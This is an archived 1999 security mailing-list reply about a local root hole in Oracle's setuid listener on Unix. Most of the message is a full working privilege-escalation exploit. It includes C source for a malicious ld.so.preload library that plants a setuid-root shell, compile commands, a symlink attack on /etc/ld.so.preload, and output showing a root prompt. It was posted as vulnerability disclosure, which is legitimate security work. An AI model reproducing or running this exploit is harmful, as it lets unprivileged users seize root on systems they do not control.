Re: Oracle 8 root exploit

From: Martin Mevald (martinmvat_private)
Date: Mon Nov 15 1999 - 07:51:54 PST


    Greetings,
    
    Oracle 7.3.4 is vulnerable too.
    
    $ uname -a
    SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4
    
    ---
    
    Linux: Oracle version: 8.0.5
    
    There is no dbsnmp with the suid bit set on Linux. There is tnslsnr.
    
    The program dumps the file listener.log:
    
    	open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666)
    
    Exploit:
    
    oracle-ex.c
    --------------------------
    
    #include <unistd.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <stdlib.h>
    
    /* Built with -nostartfiles, so this _init replaces the default library
       constructor: it runs in every dynamically linked program that loads
       the library, i.e. in every program once the library is named in
       /etc/ld.so.preload. */
    void _init()
    {
      /* act only inside a process that is already running as root */
      if (!geteuid()) {
    
        /* drop the preload entry first so other programs keep working */
        remove("/etc/ld.so.preload");
    
        /* leave a setuid-root copy of /bin/sh in /tmp and exit via exec */
        execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
    
      }
    
    }
    ---------------------------
    
    # build the preload library (the preload line below expects it at /tmp/libno_ex.so.1.0)
    $ gcc -o oracle-ex.o -c oracle-ex.c -fPIC
    $ gcc  -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles
    
    $  unset ORACLE_HOME
    
    # with umask 0000 the 0666 mode in the open() above yields a world-writable file;
    # the suid listener follows the symlink and creates /etc/ld.so.preload for us
    $  umask 0000
    $  ln -s /etc/ld.so.preload  /tmp/listener.log
    $  /u01/app/oracle/product/8.0.5/bin/tnslsnr
    
    # /etc/ld.so.preload is now writable by the unprivileged user
    $ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload
    
    # trigger any root-run, dynamically linked service (the telnet daemon here):
    # it loads the preload library, _init runs as root and leaves /tmp/xxxx behind
    $ telnet localhost
    
    Trying ...
    Connected to localhost.localdomain.
    Escape character is '^]'.
    Connection closed by foreign host.
    
    $ ./xxxx
    #
    
    
    Martin Mevald, martinmvat_private
    
    On Sat, 13 Nov 1999, Tellier, Brock wrote:
    
    > Greetings,
    >
    > OVERVIEW
    > A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
    > to obtain root privileges.
    >
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:36 PDT